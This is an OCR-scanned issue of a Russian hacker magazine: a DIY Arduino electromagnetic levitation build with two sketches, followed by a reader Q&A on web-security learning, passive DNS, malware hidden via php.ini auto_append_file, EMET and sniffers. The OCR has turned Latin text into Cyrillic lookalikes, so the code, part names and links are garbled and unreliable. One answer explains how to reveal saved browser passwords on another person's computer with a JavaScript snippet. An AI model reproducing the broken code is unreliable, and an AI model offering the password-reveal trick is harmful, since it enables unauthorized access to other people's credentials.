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о Среди врагов человечества отдельное место занимает гравитация, 
и немало людей сложило головы, сражаясь с ней. Пришла пора при- 
соединиться к этой борьбе, а поможет нам в этом славном деле эф- 
фект электромагнитной левитации. 



Это полезнейшее явление. Благодаря ему по мегаполисам торопли- 
во шуршат поезда на магнитной подушке, а в особо важных меха- 
низмах вращаются неподвластные трению магнитные подшипники. 
В этой статье я расскажу, как собрать настольный гаджет электро- 
магнитной левитации. К сожалению, летать тебе он не позволит, но 
заставит парить в воздухе небольшой хорошо магнитящийся пред- 
мет — например, крохотный глобус, или кубик, к которому можно 
клеить липкие заметки, чтобы они маячили у тебя перед носом. 

Как это работает? 

Если кратко — у тебя есть электромагнит, который притягивает 
железный предмет (например, гайку) и должен бы притянуть до 
конца, но как только гайка приближается к нему слишком близко, 
магнит отключается, и гайка начинает падать. Как только она опу- 
стится ниже определенного уровня — магнит снова включается 
и вновь тянет гайку вверх. Если положение отслеживать точно, а 
с магнитом управляться быстро, то можно попасть в равновесное 
состояние, и колебания гайки будут незаметны. Добиться этого 
эффекта можно разными способами, поэтому рассмотрим все попу- 
лярные возможности. Но в любом случае в установке будет пять 
элементов: 

1. электромагнит — главный положительный герой, борющийся с 
гравитацией; 



2. источник питания, так как кушать хочется всем; 

3. драйвер постоянного тока (будет брать сигнал с управляющей 
схемы и включать-выключать магнит, который должен быть доволь- 
но мощным и напрямую включаться любыми логическими микро- 
схемами не сможет); 

4. обратная связь, чтобы знать, где сейчас наша гайка, и случайно 
не перетянуть ее в ту или другую сторону; 

5. система управления, которая будет собирать информацию с дат- 
чиков и решать, когда и как включать электромагнит. 

Теперь обо всем по порядку. 

Магнит 

Магнит можно получить тремя путями: сделать самому, купить готовый 
и достать из какого-нибудь реле или соленоида. Готовые магниты 
встречаются в продаже нечасто, но если нашел их в изобилии, то 
бери с небольшим круглым сердечником, рассчитанный на 12 В — с 
таким будет удобнее всего управляться. Внутреннее сопротивление 
должно быть не меньше 20 Ом, иначе получится лишь эффективно 
нагревать пространство. Это же касается и катушек реле. Если будешь 
использовать катушку от соленоида, то вместо подвижного внутренне- 
го сердечника нужно будет подобрать плотно сидящий болт. 

Но если поиски по магазинам и чердакам к успеху не привели, то 
можешь сделать магнит сам. Для этого понадобится сердечник, он 
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Принципиальная электрическая схема нашего левитатора 



должен удовлетворять противоречивым условиям: быть одновремен- 
но массивным, но не слишком большого диаметра, чтобы создавае- 
мое поле было лучше сосредоточено. Идеально подойдет шпилька 
диаметром 8-10 мм и длиной около 60 мм, можно использовать и болт 
такой же длины. Для обмотки нужен лакированный провод сечением 
не меньше 0,03 мм2 (или диаметром — 0,2 мм), его несложно найти 
в магазинах, но можно и добыть, разобрав трансформатор какого- 
нибудь мелкого блока питания — вторичная обмотка скорее всего 
именно таким проводом и намотана. Лучше брать низкокачественные 
блоки питания — плохо собранные пластинчатые сердечники их 
трансформаторов будет легко расковырять. Теперь этот провод нужно 
намотать на болт. Мощность магнита измеряется в ампер-витках и 
зависит от произведения протекающего тока на число витков, поэто- 
му мотать придется много, минимум 500 оборотов — так что подумай, 
как этот процесс можно упростить. Я зажал болт-сердечник в патрон 
шуруповерта, а катушку, с которой провод сматывал, одел на ручку 
штатива от фотоаппарата. Дрель (а тем более блендер или миксер) 
использовать не советую — у них высокие обороты, и если провод в 
какой-то момент зацепится, то все может разлететься! Старайся укла- 
дывать витки плотно один к другому, слой за слоем, поскольку зазоры 
сильно снижают эффективность. После того как ты решишь, что намо- 
тал достаточно, зачисти концы проводов (лак на концах удобно сжечь 
зажигалкой) и померь сопротивление мультиметром, оптимум — 20-30 
Ом. Подключи магнит к блоку питания и проверь, не слишком ли он 
греется и хорошо ли притягивает. 

Источник питания 

Тебе также понадобится хороший источник питания на 12 В: маг- 
нит может потреблять приличный ток, так что маленькой батарей- 
кой здесь не отделаться. Если есть возможность — воспользуйся 
АТХ блоком питания компьютера. Конечно, использовать тот, что 
стоит в компьютере, не стоит — по закону Мерфи в самый важный 
момент что-нибудь закоротит и блок может помереть (хотя у них 
есть защита от замыканий), и компьютеру может тоже не поздоро- 
виться. Чтобы включить АТХ блок питания без компа, в широком 
20-пиновом разъеме соедини зеленый провод с любым черным, а 
питание бери с разъема жесткого диска или видеокарты, желтый 
провод — это +12 В , а черный — земля. Если такого блока нет, 
подойдет и менее мощный источник от чего-нибудь бытового — 
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Аналоговый датчик Холла 5559Е 
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МОП-транзистор IН^530N 
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Переменный резистор 10 кОм 


Р2 


Резистор 100 Ом 


КЗ 


Резистор 10 кОм 


Т1 


Транзистор 2N3904 


ІЛ 


Плата АР01Л N0 



зарядника дрели, ноутбука и так далее. Можно взять и свинцовый 
12-вольтовый аккумулятор от ИБП. Теперь посмотрим, как магни- 
том можно управлять. 

Драйвер 

Магнит, в зависимости оттого, насколько удачным он получился, 
может потреблять добрую дюжину ватт мощности — соответствен- 
но, и ток будет около 1 А. Чтобы управляться с такой нагрузкой, 
нужен мощный транзистор. Можно использовать биполярный 
прп-транзистор, но для его полного открытия требуется большой 
ток - микроконтроллеру и не потянуть. Лучше использовать поле- 
вой транзистор (он же МОП или М05ЕЕТ) Ы-типа, затвор которого 
управляется не током, а напряжением. Какой-то заметный ток 
требуется только для переключения состояний, поэтому такой 
транзистор можно смело вешать на ножку микроконтроллера 
через небольшое токоограничительное сопротивление (порядка 
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100 Ом). Единственный момент — далеко не все МОП-транзисторы 
способны открыться от 5 В, которые выдает контроллер, поэтому 
стоит поискать тот, который сможет. Я использовал ІРІ_530Ы — это 
настоящий великан, способен выдерживать ток до 1 7 А при напря- 
жении до 100 В. Если такого найти не удалось, то можно использо- 
вать любой другой (скажем, ІР Е630М), но ему для полноценного 
открытия на затвор нужно подать 12 В. Для этого в схему следует 
добавить еще небольшой транзистор, который будет служить клю- 
чом на более высокое напряжение. В моем случае это 2Ы3904, 
но можно использовать практически любой прп-транзистор. Еще 
один важный момент в управлении магнитом связан с его значи- 
тельной индуктивностью: пока ток включен, энергия запасается 
в электромагнитном поле, но если цепь разомкнуть, то ей необ- 
ходимо куда-то деться, и это выльется в значительный скачок 
напряжения на выводах обмотки. Такого удара ни один транзистор 
не переживет, поэтому между выводами катушки необходимо 
поставить диод (у меня 1 п4007) — так, чтобы во время нормальной 
работы он стоял против тока, а в момент размыкания цепи, когда 
ток начинает бежать в обратную сторону, замыкал бы катушку саму 
на себя. Сила, чтобы управиться с магнитом, теперь есть, и оста- 
лось понять, когда же приходит время его включать. 

Обратная связь 

Самый простой вариант для отслеживания положения левитирую- 
щего предмета — использовать оптическую пару инфракрасный 
светодиод и фототранзистор, выстроенные в одну линию. Когда 
гайка (или болт) находится ниже прямой, то ИК-излучение распро- 
страняется свободно до датчика, но как только объект подлетает 
ближе, луч прерывается, и значение на выходе датчика падает 
— пора выключать магнит. Схема проста, но на практике имеет 



большой минус — мы можем знать, выше или ниже контрольной 
точки находится наша гайка, но не ее точное положение в каждый 
момент времени. Это не страшно, но может вызвать проблемы, 
если мы захотим плавно регулировать высоту. Кроме того, проле- 
тающая мимо датчиков муха может все сломать. 

Более удачный вариант (тоже оптический) — поставить инфра- 
красный или лазерный дальномер под магнит (хотя можно и 
сверху) и измерять расстояние. Но в этом случае придется моди- 
фицировать болт — приклеивать пластинку с большей поверхно- 
стью, иначе датчик его просто не увидит. Особенно можно поэстет- 
ствовать, установив не оптический, а ультразвуковой дальномер, 
хотя в заданных интервалах (несколько сантиметров) точность 
большинства из них будет невелика. Да и от мух эти варианты 
никак не спасают. Но недорогое и сердитое решение все-таки 
есть! 

В природе существует замечательный эффект: если по проводя- 
щей металлической пластине пропущен ток, а поперек пластины 
приложено магнитное поле, то перемещающиеся по пластине 
заряды будут отклоняться силой Лоренца и создавать по краям 
пластины разность потенциалов, то есть напряжение, которое 
будет зависеть от величины магнитного поля. На этом эффекте 
работают датчики Холла. Применить их к определению положения 
довольно просто — прикрепи к болту магнит и все. Напряжение на 
выходе датчика будет зависеть от силы поля, которое зависит от 
расстояния до болта с магнитиком. И самое главное — летающие 
насекомые никак не повлияют! 

В продаже существует множество датчиков, в том числе те, 
которые измеряют поле в нескольких плоскостях. Тебе же нужен 
простой аналоговый датчик, иногда в описаниях их называют 
линейными, с чувствительностью 400-1000 Гаусс. Я использовал 
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Собранная система на базе датчика Холла 

5559Е, но идеальным вариантом его не назовешь — он имеет 
корпус 50Т223 (для поверхностного монтажа), и чтобы использо- 
вать его «на весу», пришлось подпаивать довольно хлипкие про- 
водочки. Удобнее выбрать датчик в корпусе 1о92 (например 5519, 
5549 или 55495А). Также понадобится хороший магнит, лучше 
редкоземельный. Можно его достать из мотора привода СШ/ВУй, 
взять из детского магнитного конструктора Вогпітадо или зака- 
зать у китайцев на ЬирУ/з.беаІехІгете.сот/зеагсб/тадпеІз . там 
хороший выбор и цены приемлемые. 

На первый взгляд — это все. Подвешиваешь датчик под электро- 
магнит и радуешься жизни. Но есть важный момент: датчик будет 
измерять как поле магнитика на болте, так и поле электромаг- 
нита, а поскольку магнит будет то включаться, то выключаться, 
то и значения будут скакать. Вариантов решения два. Первый 
достаточно элегантен — использовать пару датчиков Холла. Один 
оставить так же, внизу магнита, а второй — повесить с противопо- 
ложной стороны магнита. Если обмотка сделана симметрично, то 
поле с обеих сторон электромагнита по модулю будет одинаковым, 
но сверху присутствия болта с магнитиком чувствоваться не будет, 
и в качестве управляющего сигнала можно использовать разницу 
показаний датчиков. Второй вариант требует применения более 
сложной математики, но позволяет использовать один датчик 
Холла. Для учета поля нужно смоделировать поведение магнита 
и высчитывать поправку на значения датчика Холла в зависимо- 
сти от состояния электромагнита. Можно, конечно, постараться 
подобрать оптимальные параметры и без особых расчетов, но 




Оптическая обратная связь на базе ИК-светодиода 

это долго и утомительно, поэтому проще остановиться на первом 
варианте. 

Система управления 

Как правило, управление подобными устройствами делают полно- 
стью аналоговое, на паре операционных усилителей, но можно 
сделать управление и на микроконтроллере. Так что если у тебя в 
хозяйстве есть плата Агсіиіпо, то здесь она пригодится. Я исполь- 
зовал свою видавшую многое Агсіиіпо Оіесіппііа, но подойдет и 
любая другая пятивольтовая версия -Оиеппііапоѵе, ІІпо и различ- 
ные клоны. 

Собираем! 

Ключевые моменты создания гаджета мы уже рассмотрели, теперь 
поподробнее остановимся на том, как все это собрать, запустить 
и отладить. Схему можно собрать на макетной плате, но можешь 
попробовать обойтись без нее — элементов немного, и они вполне 
могут повисеть в воздухе. Для подобных «воздушных» схем удобно 
иметь десяток разноцветных проводов, у которых с обоих концов 
припаяны небольшие крокодильчики. Диод йі можешь напаять 
непосредственно на выходы катушки магнита І_1, а диод 02 — 
между стоком и истоком МОП-транзистора 01. Сам транзистор 
можно прикрепить к радиатору не столько в целях охлаждения 
(при этих токах он сильно греться не будет), сколько в качестве 
подставки. Если у тебя полевик из серии ІРІ_, то транзистор 01 и 
сопротивление РЗ из схемы можешь выкинуть и закинуть сопро- 
тивление Р2 на ножку йі 0 Агсіиіпо (или любую другую ножку с 
ШИМ-выходом). У полевиков в корпусах ТО220 (а тебе удобней 
работать именно с такими) ножки нумеруются слева направо сле- 
дующим образом: 1 (затвор), который нужно подключить к управ- 
ляющему выходу; 2 (сток) — к минусу нагрузки, 3 (исток) — вывести 
на землю. 

Второй выход нагрузки нужно подключить к питанию +12 Вольт. 
Плату Агсіиіпо также нужно от чего-нибудь запитать, лучше под- 
соединить ее к тому же 1 2-вольтовому источнику, что и магнит, 
но для этого тебе понадобится подходящий штекер с диаметром 
внутреннего штырька 2,1 мм, и внешним диаметром 5,5 мм. Можно 
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взять питание и через 115В от компьютера, но тогда не забудь соеди- 
нить землю на плате с землей питания магнита. С другой стороны 
платы к аналоговым входам нужно подключить датчики. Выходы дат- 
чиков Холла ІС1 и ІС2 к пинам АО и А1 , ѴСС — к выходу +5 В, и 6І\Ю 
— к земле. Датчик ІС1 нужно укрепить под магнитом, а ІС2 — над ним 
(поскольку направления полей будут противоположные, то и датчики 
нужно сориентировать по-разному). Скотч — самое надежное сред- 
ство для крепления. Также для подстройки параметров будет полезен 
переменный резистор на 10 кОм (хотя величина не принципиальна). 
На нем должно быть 3 выхода: крайние подключи к земле и +5 В, а 
средний — к аналоговому входу А2. 

Из железной работы осталось только к чему-нибудь подвесить магнит. 
К чему именно — решай исходя из подручных материалов. Это может 
быть, например, зажим «третьей руки», штатив или, как в моем слу- 
чае, деревянный ящичек из ИКЕА. Главное — убедиться в том, что он 
не болтается, и можно приступать к программной начинке. Для этого 
гаджета потребуется создать два скетча для Агбиіпо. При помощи 
первого ты измеришь параметры системы и получишь пару волшеб- 
ных чисел, которые пригодятся во второй, рабочей прошивке. 
Поскольку магнит может создавать не совсем симметричное поле, и 
датчики могут располагаться не идеально ровно, то модули значений 
на них могут отличаться. Поэтому нужно замерить разницу в показа- 
ниях, чтобы рассчитать поправку. 

Скетч 1 

сопзі іпі іпі = А0; // аналоговый вход датчика Холла 1 

сопзі іпі: іп2 = А1; // аналоговый вход датчика Холла 2 

сопзі іпі: оиіі = 10; // аналоговый выход (ШИМ) на магнит. 

іп БІ = 0; // значение датчика Холла 1 

іпі: 52 = 0; // значение датчика Холла 2 

іпі: оі; // Выход 

ѵоісі 5еіир() { 

// будем следить за состоянием в консоли 
//Бегіаі . Ье§іп(9600) ; 

} 

ѵоісі 1оор() { // запускаем программу по кругу 
// читаем аналоговые входы 

апа1о§ІлІгііе(оиі1, 255 ); // записываем в выход нужное 
// состоние магнита 

сІе1ау(15); // ждем, пока магнит включится 

51 = апа1о§КеасІ(іп1); // читаем первый датчик Холла 

52 = апа1о§КеасІ(іп2); // читаем второй датчик Холла 
оі = 52 -5І; // считаем разницу входов 

Бегіаі. ргіпі("та§пеі оп: 5І = "); // аккуратно все выводим 

// в консоль 

Бегіаі. ргіпі( 5І ); 

Бегіаі. ргіпі(" 52 = "); 

Бегіаі. ргіпі( 52 ); 

Бегіаі. ргіпі(" сіеііа = "); 

Бегіаі. ргіпі( оі ); 

апа1о§Іл!гііе(оиі1, 25 ); // записываем в выход нужное 

// состояние магнита, 10% мощности 
сІе1ау(15); // ждем, пока магнит выключится 

51 = апа1о§КеасІ(іп1); // читаем первый датчик Холла 

52 = апа1о§КеасІ(іп2); // читаем второй датчик Холла 

оі = 52 -5І; // считаем разницу входов 

Бегіаі. ргіпі("та§пеі оТТ: 5І = "); // аккуратно все выводим 

// в консоль 

Бегіаі. ргіпі( 5І ); 

Бегіаі. ргіпі(" 52 = "); 

Бегіаі. ргіпі( 52 ); 

Бегіаі. ргіпі(" сіеііа = "); 

Бегіаі. ргіпі1п( оі ); // переходим в конце на новую строку 
сІе1ау(1000); // через секунду - все заново 

} 



Сложность управления заключается еще и в том, что для устаканива- 
ния при изменении состояния на выходе контроллера должно пройти 
порядка пяти миллисекунд (за счет большой индуктивности магнита). 
Чтобы сократить это время, можно управлять магнитом плавно и не 
включать-выключать его полностью, а лишь чутка изменять мощ- 
ность. На Агбиіпо это можно сделать при помощи ШИМ-выхода. 

ШИМ (РѴѴМ, широтно-импульсная модуляция) — это способ плавно 
менять напряжение на выходе, используя лишь цифровые состояния. 
То есть часть времени выход включен, а часть — выключен, но из-за 
инертности работает такая схема, будто выход включен постоянно, 
но с половинной мощностью. После запуска первой прошивки у тебя 
должно остаться два числа — разница при 10% и при 100% мощности. 
Во второй, рабочий скетч ты эти значения подставишь сам. Рабочий 
код довольно прост: читаем значения с датчиков, вносим поправки, 
по значению положения переменного резистора регулируем желае- 
мый уровень мощности (а значит, и высоту) и устанавливаем соот- 
ветствующий уровень на выход. Поскольку мы не оценивали, в каком 
диапазоне будут значения, возвращаемые датчиком при различных 
положениях переменного резистора, то рабочий диапазон высот 
будет, очевидно, уже. Но решить проблему просто — покрути ручку, и 
найди, где работает! 

Скетч 2 

сопбі: іпі іпі = А0; //аналоговый вход датчика Холла 1 
сопбі іпі іп2 = А1; //аналоговый вход датчика Холла 2 
сопбі іпі іпЗ = А2; //аналоговый вход переменного резистора 

сопбі іпі сІ10 = квставь из предыдущего кода>; 

//выход при 10% мощности 
сопбі СІ100 = квставь из предыдущего кода>; 

//выход при 100% мощности 

сопбі іпі оиіі = 10; //аналоговый выход (ШИМ) на магнит. 

іпі 5І = 0; // значение датчика Холла 
іпі 52 = 0; // значение датчика Холла 
іпі 53 = 0; // значение переменного резистора 
іпі оі = 255; // состояние выхода, по умолчанию 

// полностью включен 
іпі сі = 0; // поправка 

іпі ѵ; // итоговое значение с датчиков 
ѵоісі 5еіир() {} 
ѵоі< 1оор() 

{ 

51 = апа1о§КеасІ(іп1); // читаем значение датчика Холла 

52 = апа1о§КеасІ(іп2); // читаем текущее значение 

// потенциометра 

сі = тар (оі, 25, 255, СІ10, СІ100); // считаем поправку 

ѵ = аЬ5 (5І- 52) +сІ ; // разница с поправкой 

оі = тар (ѵ, 0, 1024, 25, 255); // рассчитываем выход, магнит 

// никогда полностью не выключен 
апа1о§Іл!гііе(оиі1, оі); // записываем в выход нужное 
// состояние магнита. 

сІе1ауМісго5есопсІ5(100); // ждем некоторое время, пока АЦП 

// вновь будет готов считывать данные 

После того как соберешь и включишь, попробуй поиграть с раз- 
ными грузиками и магнитами, чтобы найти те, при которых работа 
наиболее стабильна. 

Если не получается — не сдавайся, попробуй поменять что-нибудь 
в прошивке, разбери и собери все еще раз, должно получиться! 
Ведь конечная цель — полет даже более завораживающий, чем у 
птиц в небе, а к этому человечество стремилось не одну сотню лет. 
Так что постарайся! Но если и после всех стараний результат нуле- 
вой, то можешь заказать на сайте геиот.сот/егтйз.азрх готовый 
комплект для сборки. Удачи! т 
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Степан «Біер» Ильин НѵѵШег.сот/зІераЫ 




Есть вопросы — присылай 
на іад@геаІ.хакер.ги 



О: Я активно занимаюсь разработкой 
и сейчас хочу максимально глубоко 
изучить аспект безопасности веб- 
приложений. Начать с самых азов. Есть 
ли такой ресурс, где подробно, на при- 
мерах объяснена суть различных типов 
уязвимостей, о которых вы пишете: $01. 
Іп іесгіоп, Х55 и так далее. И на чем мож- 
но потренироваться, чтобы закрепить 
полученные навыки и не попасть под 
статью УК? 

А: Это очень частый вопрос, и одним из лучших 
ресурсов, которые можно в такой ситуации 
посоветовать, является проектОѴѴАЭРТор 
10 (с Л/А5І 

Ргощс ). Это постоянно обновляемое описание 
наиболее распространенныхуязвимостей в 
веб-приложениях. Всего описывается десять 

ТИПОВ рИСКОВ: 

• А1 : ІПІеСІІОП; 

• А2: Сгозз-ЭіІеЗсгірбпд (Х53); 

• АЗ: Вгокеп АиіЬепбсабоп апб Зеззіоп 
МападетепС 

• и прочие. 

Для каждого типа приводится базовое опи- 
сание проблемы (буквально «на пальцах») и 
ссылки на материалы для более подробного 
изучения. Чтобы не погрязнуть в бесконечной 
теории и понять, настолько просто могут быть 



проэксплуатированыте или иныеуязвимо- 
сти, есть немало проектов для тренировки, о 
которых мы рассказывали в статье «Площадка 
для взлома: головоломки для хакера» [ ЫРІу/ 
хакер Ігаіпіпдз ). Я особенно рекомендую про- 
ект МибШбае ( Ьіиѵ/МиІІШсІае ). Фишка в его 
прямой связи с проектом ОѴѴАЗРТор 10. Для 
каждого из десяти типов уязвимостей автор 
написал скрипте намеренно оставленными 
ошибками, чтобы каждый мог попробовать 
свои силы в эксплуатировании каждой из 
них. Код написан очень просто, что позволяет 
облегчить понимание сути проблемы. Проект 
легко устанавливается подтуксом или под 
виндой на ХАМРР-сервере. Если эксплуата- 
ция уязвимости тебе удалась, то в качестве 
дополнительного задания найденный баг 
предлагается устранить. 

О: Можно ли как-то получить не теку- 
щие, а предыдущие записи РЫБ для 
определенного доменного имени? 

То есть отправить в качестве запроса 
домен вроде 2 СІе$ЬуІатаІѵѵаге.сс и 
получить отчеты обо всех ответах РЫБ 
за прошедшее время? 

А: Да, специально для этого существуюттак 
называемые пассивные базы данных ОЫЗ: 
РЫЗРатзе, І5С, ВЕК.бе и СЕРТЕЕ. Наиболее 



просто взаимодействовать с ними позволяет 
специальный скрипт Раззіѵе ОЫЗдиегуІооІ 
( сосіе.доодіе.сопп/р/раззіѵе-сіпз-диегѵ-іооі ). 
Установка ничем не примечательна и выполня- 
ется через РиЬуѲеппз: 

§ет Іпз1:а11 раззіѵе-сіпз 

Для работы с некоторыми сервисами потре- 
буется дополнительная настройка. Например, 
І5С в каждом запросе требует использовать 
специальный АРІ-ключ, который необходимо 
заблаговременно получить (для этого нужно 
отправить запрос на сІпзсІЬЙІзс.огд ). Поумол- 
чанию же скрипт использует базу ОЫЭРагзе, 
которая нетребует конфигурирования. Запрос 
в этом случае вы глядит так: 

./рсІп5І:оо1. гЬ <ір | сіотаіп | сісіг> 

О: Мне необходимо выяснить, в ка- 
ком порядке загружаются драйвера 
устройств во время старта системы. Как 
это сделать? 

А: У Марка Руссиновича для этого есть специ- 
альная утилита 1_оасЮгс1ег( іесЬпе1:.ппісго5о0:. 
сот/ги-ги/5Ѵ5Іп1:егпа[5/ЬЬ89741 6 ). Выпу- 
щенная еще в 2006 году, она и сейчас отлично 
показывает порядокзагрузки драйверов в ОС. 
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Включаем РЕР/А5І.В для 
произвольных приложений 



В качестве бонуса утилита также отображает, в 
какой последовательности стартуют сервисы. 

О: Можно ли как-то быстро посмотреть 
пароли, сохраненные в браузере, когда 
есть доступ к чужому компьютеру, но 
нет возможности установить дополни- 
тельные приложения? 

А: В некоторых случаях это реально. Если 
есть возможность зайти на интересующую 
страницу, где браузер сам подставит пароль, 
то нужно лишь посмотреть, что находится 
под звездочками. Для этого есть замеча- 
тельный баѵа-скрипт ( Ыиу/геѵеаі разз ). 
который необходимо скопировать в адрес- 
ную строку и выполнить. Вместо звездочек 
отобразится пароль в открытом виде. Сце- 
нарий совместим со всеми современными 
браузерами. 

О: Обнаружил, что один из моих ресур- 
сов взломали и заливают оттуда мал- 
варь. Я не самый последний чайник и 
обыскал буквально все файлы проекта, 
чтобы найти зловредный код, который 
автоматически инъектируется в леги- 
тимные документы. Ничего не вышло! 
Решил пойти более радикальным путем 
и восстановил бэкап с того момента, 
когда сайт еще 100% не был подвержен 
атаке. Проблема осталась. Что я мог 
упустить? 

А: Из собственного опыта могу сказать, что в 
такой ситуации люди обычнозабываютпро- 
веритьдва места: файл .Ыассезз (в котором 
могут оказаться неожиданные директивы) и 
директорию сді-Ьіп. 

Папка сді-Ьіп чаще всего находится вне ката- 
лога Ысіосз и потому остается без внимания. 

На самом деле именно она нередко становится 
местом для хостинга малвари. К примеру, в ней 
легко может оказаться файл рЬр.іпі, содержа- 
щий строчку вроде: 



аи1:о_аррепб_Іі1е = "/Ьоте/изег/ІІБЕК/ 
с§і-Ьіп/5есигі1:у . с§і 




Простенькая админка Наікіі Ргоху 

Таким образом клюбому РНР-скриптуавтома- 
тически добавляется содержимое сценария 
зесигііу.сді, в котором может быть что угодно. 
При этом нигде в основных файлах проекта, 
даже при тщательнейшем изучении, призна- 
ков малвариты не найдешь. 

О: Удивляюсь, почему не все прило- 
жения используют ОЕР и А5І.В? Есть 
ли инструмент, который, во-первых, 
позволял бы выяснить, кто до сих 
пор находится в рядах отстающих, 
а во-вторых включить для этих про- 
грамм защитные механизмы прину- 
дительно? 

А: Для опытных пользователей Місгозойуже 
довольно давно выпустил утилиту ЕМЕТ — 
ЕпЬапсеб МШдабоп ЕхрегіепсеТооІкіІ ( ЬІІ.Іѵ/ 
ЕМЕТраде ). За столь громоздким названием 
скрывается прога с простым 6111-интерфейсом, 
позволяющая быстро выяснить, какие при- 
ложения используют 0ЕР/АВІ_Р, а какие — нет. 
Для любого исполняемого файла можно 
принудительно активировать ОЕР, ЗЕНОР, 
А8І_Р,защитуотНеар5ргауи ЕАЕ. Напомню, 
что использование этих защитных механизмов 
кардинальным образом влияетна возможность 
эксплуатации в приложении тех же самых пре- 
словутых(и оченьопасных) ошибокперепол- 
нения буфера. 

О: Подскажи самый простой способ 
начать разрабатывать веб-приложения 
на РуіИоп. 

А: Если идти по пути наименьшего сопротивле- 
ния, то лучше всего взять готовый фреймворк 
вроде ѵѵеЬ. ру [ ѵѵеЬрѵ.огд ]. сЬеггу.ру ( сЬеггуру. 
огд ). 0)апдо ( б|апдорго]есЕсот ). Тірбу [ ЬрР/.огд ] 
или Еіазк ^іазк.росоо.оі ). Какэто работает? 
Если взять для примера Еіазк.то простейшее 
веб-приложениеуместится в десяток строчек 
кода: 

■Ргот Павк ітрогі: Ріавк 

арр = Р1авк( пате ) 

@арр. гои1:е("/") 

сІе-Р бе11о() : 

ге1:игп "Неііо Іліогіб!" 




Использовать І.Е55 проще простого, 
а жить всем становится гораздо 
проще 

і-р пате == " таіп 

арр. гип() 

Для установки фреймворка и запуска сервера 
также понадобится самая малость: 

$ еаву_іпв1:а11 Ріавк 

$ руібоп беііо.ру 

* Киппіп§ оп б1:1:р://1оса1бов1;:50ѲѲ/ 

Таким образом, веб-сервер будетзапущен на 
5000 портулокалхоста. Помимо фреймворков 
можно взять такой интересный проект как 
ѵѵеЬ2ру ( уѵеЬ2ру.сот ). Он вообще не требует 
установки или конфигурирования, включает 
интерпретатор Руібоп (поэтому его даже мож- 
но неустанавливать), веб-сервер с поддерж- 
кой 55І_, демон ЗСНЛе, системулогирования 
ошибок, веб-админку для управления (демку 
панели можно посмотреть по линку уѵеЬ2ру. 
сот/бето асІтіп/сІебаиІР/зіРе ). Короче 
говоря, через пять минут можно получить уже 
готовый сервер, на котором будет крутиться 
наше приложение. Простейший веб-проект 
при этом выглядит проще простого: 

бе-Р іпбех() : 

геіигп "Неііо іліогісі!" 

О: Существуют ли сниферы, которые 
работают на смартфонах? 

А: Портированная версия Ісрбитр есть под 
Маето, то есть снифер можно запустить по 
меньшей мере на Ыокіа N900. Но это экзоти- 
ка. Если брать платформы популярнее, то тот 
жеісрбитрестьи подАпбгоіб. Правда, для 
его установки придется скачать и установить 
приложение РаскеіЗпі^егі зіІеБ.доодІе.сот/ 
зііе/апбгоібагіз/раскеі-зпі^ег ). Имей в виду, 
что для этого на девайсе необходимо сделать 
)аіІЬгеак, чтобы иметь права рута. Радует, что 
приложение знает, какая именно информация 
представляет интерес (для ѴѴі-ЕІ и ВІиеІооіЬ- 
соединений) и отфильтровывает их из общего 
потока данных. Для іРЬопеестьспециально на- 
писаннаятулза, называется рігпі (но, опять же, 
установить ее можнотолько на джейлбрейкну- 
тый телефон через альтернативный менеджер 
приложений Субіа). В любом случае, смартфону 
будеттяжко обрабатывать перехваченный 
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трафик. Поэтому максимум, на что можно 
рассчитывать, это дамп сперехваченнымтра- 
фиком, который уже после можно обработать на 
компьютере с помощью ѴѴігезЬагк ЫгезЬагк. 
огд ) или другого анализатора. 

О: Хочу организовать службу поддерж- 
ки для своего программного продукта, 
чтобы клиенты в случае необходимости 
оформляли описание проблемы в виде 
небольших скринкастов. Как это лучше 
всего реализовать? 

А: Самый простой способ записать скринкаст 

— это, безусловно, воспользоваться онлайн- 
сервисом вроде зсгеепг.сот . Фишка втом, что 
для создания видеоролика подобным образом 
вообще не нужно ничего скачивать и уста- 
навливать. Все выполняется через браузер. 
Причем решение работает какподѴѴіпсІоѵѵз, 
таки для Мае. Возможно, если поискать, то 
найдется аналогичный сервис с открытым АРІ, 
позволяющий встроить функцию для быстрой 
записи скринкаста в свои разработки — это 
может быть полезно для интеграции функции 
записи в систему тикетов. 

О: С ростом проекта время загрузки 
главной страницы растет. Пока раз- 
работчики занимаются оптимизацией 
программного кода, я хочу максималь- 
но облегчить саму страницу. С чего 
начать? 

А: Самым первым пунктом в планетвоих 
действий должен стать а нал из то го, что, соб- 
ственно, вызывает наибольшие затруднения 
во время загрузки страницы. Соответственно, 
все дальнейшие работы сводятся ктому, чтобы 
эти слабые места устранить. Для анализа 
времени загрузки существуютспециальные 
инструменты. 

Ѵаііоо! Ѵ51оѵѵ ( беѵеіорег.уабоо.сот/ѵзіоѵѵ ). 

Анализатор разработан компанией Ѵабоо и 
реализован в виде плагина для Рігебох’а, но для 
работы потребуется также установить аддон 
РігеЬид. Ѵзіоѵѵ проводит два типа анализа: во- 
первых, выяснение степени оптимизации для 
индексирования в поисковиках, а во-вторых 

— определение быстродействия Ооситепі 
ОЬіесІ Мобеі РОМ), то есть времени загрузки 
и рендеринга страницы. Помимо этого плагин 
включает в себя шесть полезных утилит, в 
том числе для тестирования ^ѵаЭсгірІ-кода 

и оптимизации изображений через сервис 
ЗтизЬ.Іі 

ѴѴеЬ Раде Тез* ( ѵѵеЬрадеІезСог ). 

Этот продвинутый анализатор от компании 
А01_способен произвести специализирован- 
ный анализ — к примеру, можно эмулировать 
определенную версию браузера или скорость 
соединения. Помимо этого ѴѴеЬ Раде Тез! 
поможет произвести визуальное сравнение с 
другими сайтами. 

РадеБреесІ ( сосіе.доодіе.сот/зреесі/раде- 
зреесі ). 

Этотанализатортакже, каки Ѵ51оѵѵ, реали- 



зован в виде плагина для Рігебох/РігеЬид. 
Веб-разработчики могут использовать Раде 
ЭреесІ для оценки производительности своих 
веб-страниц и получения предложений по их 
улучшению. 

Хороший прирост к производительности рен- 
деринга страницы может дать использование 
асинхронной загрузки скриптов. Делотут 
вот в чем. Когда браузер открывает страни- 
цу и доходит до тега <зсгір1>, он блокирует 
рендерингстраницы. То есть несмотря нато, 
что все современные браузеры используют 
параллельную загрузку элементов (скриптов, 
изображений и та к дал ее), сама прорисовка 
страницы останавливается до тех пор, пока 
скрипт не загрузится. Чтобы избежать этого, 
в больших проектах используют асинхрон- 
ные за грузчики, которые применяют хитрые 
трюки, чтобы загружать громоздкие скрипты, 
но при этом не стопорить рендерингстра- 
ницы. В некоторых случаях это дает прирост 
скорости рендеринга в 2-3 раза. Ктомуже 
такой подход позволяет загружать толь ко те 
скрипты, которые нужны пользователю. Хо- 
рошим примером такой разработки является 
уерпоре ( уерпоре|5.сот ). 

